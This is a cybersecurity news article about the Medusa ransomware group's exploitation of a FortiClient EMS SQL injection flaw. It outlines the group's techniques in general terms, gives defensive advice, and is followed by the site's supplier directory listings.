Medusa Ransomware Group: Delivering Sophisticated Attacks

Medusa is a notorious ransomware group that emerged in 2023. Unlike most ransomware operators, Medusa has established is the visible  web, alongside their traditional Dark Web activities. It has been criminally exploiting a critical vulnerability in Fortinet’s FortiClient EMS software to launch sophisticated ransomware attacks.

Medusa, known for targeting a wide range of sectors, including healthcare, manufacturing, and education, has been quick to exploit the vulnerability.

By sending malicious web requests containing SQL statements, the group manipulates the FCTUID parameter in request headers, enabling them to execute arbitrary commands via the xp_cmdshell function in Microsoft SQL Server.  

Once initial access is gained, Medusa creates a webshell on the compromised server to facilitate data exfiltration and payload delivery.  

The group employs tools like bitsadmin to transfer malicious files and establish persistence on victim systems.
Medusa’s attack chain showcases the group’s advanced capabilities, particularly in the areas of execution and defense evasion. After gaining a foothold, Medusa leverages PowerShell scripts to run commands, exfiltrate data, and execute its ransomware payload. 

The group’s malware, known as gaze.exe, kills various services and loads files referencing Tor links for data exfiltration.

To evade detection, Medusa installs compromised versions of legitimate tools  like ConnectWise and AnyDesk. These tampered RMM tools often go unnoticed due to their trusted status within the victim’s environment.
Organisations can adopt a multi-layered approach to defend against Medusa’s ransomware attacks. Implementing robust patch management practices is crucial to promptly address vulnerabilities like the Fortinet flaw.

Network segmentation, regular backups, and employee security awareness training are all essential components of a comprehensive defence strategy. As ransomware becomes increasingly sophisticated, it remains vital that organisations remain an vigilant and have recovery plans in place. 

Bitedender   |     CyberCX   |     Cyberpress   |     Cybersecurity News   |    TTB Internet Security    |   SRM Inform 

Image: Unsplash

You Might Also Read: 

Threat Intelligence: Most Prevalent Malware Rankings:


If you like this website and use the comprehensive 6,500-plus service supplier Directory, you can get unrestricted access, including the exclusive in-depth Directors Report series, by signing up for a Premium Subscription.

  • Individual £5 per month or £50 per year. Sign Up
  • Multi-User, Corporate & Library Accounts Available on Request

Cyber Security Intelligence: Captured Organised & Accessible


 

 

« Improving Threat Intelligence Sharing
Google’s EU Antitrust Case Dropped »

CyberSecurity Jobsite
Perimeter 81

Directory of Suppliers

XYPRO Technology

XYPRO Technology

XYPRO is the market leader in HPE Non-Stop Security, Risk Management and Compliance.

Cyber Security Supplier Directory

Cyber Security Supplier Directory

Our Supplier Directory lists 6,000+ specialist cyber security service providers in 128 countries worldwide. IS YOUR ORGANISATION LISTED?

FT Cyber Resilience Summit: Europe

FT Cyber Resilience Summit: Europe

27 November 2024 | In-Person & Digital | 22 Bishopsgate, London. Business leaders, Innovators & Experts address evolving cybersecurity risks.

ManageEngine

ManageEngine

As the IT management division of Zoho Corporation, ManageEngine prioritizes flexible solutions that work for all businesses, regardless of size or budget.

Clayden Law

Clayden Law

Clayden Law advise global businesses that buy and sell technology products and services. We are experts in information technology, data privacy and cybersecurity law.

44CON

44CON

44CON is an Information Security Conference & Training event taking place in London. Designed to provide something for the business and technical Information Security professional.

CW Jobs

CW Jobs

CWJobs.co.uk is a leading specialist IT recruitment website covering all areas of IT including Cyber Security.

360Logica

360Logica

360Logica is a software testing company offering numerous kinds of testing services to improve the quality and performance of your software and IT systems.

Careers in Cyber Security (CiCS)

Careers in Cyber Security (CiCS)

CareersinCyberSecurity is a leading global job board and career resource for Cyber Security, IT Audit, Technology Risk and Data Protection professionals.

Georgia Cyber Center

Georgia Cyber Center

Georgia Cyber Center is dedicated to training the next generation of professionals through education and real-world practice while also supporting innovation in new technologies for online defenses.

Defence Intelligence

Defence Intelligence

Defence Intelligence is an information security firm specializing in advanced malware protection.

SBD Automotive

SBD Automotive

SBD Automotive are specialists in automotive technology providing independent research and consultancy to help create smarter, more secure, better connected, and increasingly autonomous cars.

Google for Startups

Google for Startups

Google for Startups is Google’s initiative to help startups thrive across every corner of the world.

Wiser Market

Wiser Market

Wiser Market is a leading company in global online brand protection services, intellectual property protection, anti-Counterfeit & trademark infringements.

Marlabs

Marlabs

Marlabs is a Digital Technology Solutions company that helps companies adopt digital transformation using a comprehensive framework including Digital Automation, Enterprise Analytics and Security.

Softcat

Softcat

Softcat offer a broad portfolio of IT services and solutions covering Hybrid Infrastructure, Cyber Security, Digital Workspace and IT Intelligence.

JFrog

JFrog

JFrog is on a mission to enable continuous updates through Liquid Software, empowering developers to code high-quality applications that securely flow to end-users with zero downtime.

Xiarch Solutions

Xiarch Solutions

Xiarch Security is an global security firm that educates clients, identifies security risks, informs intelligent business decisions, and enables you to reduce your attack surface.

ResilientX

ResilientX

ResilientX is an All-In-One Security Testing Platform designed to help MSPs and SMBs to perform their security testing and assessments without having to outsource IT.

Sonar

Sonar

AI generated or written by humans, Sonar’s Clean Code Solutions cover your code quality needs, improving code reliability, maintainability, and security.

Darwinium

Darwinium

Darwinium is a Cyberfraud Prevention Platform that provides scalable customer journey protection without complexity.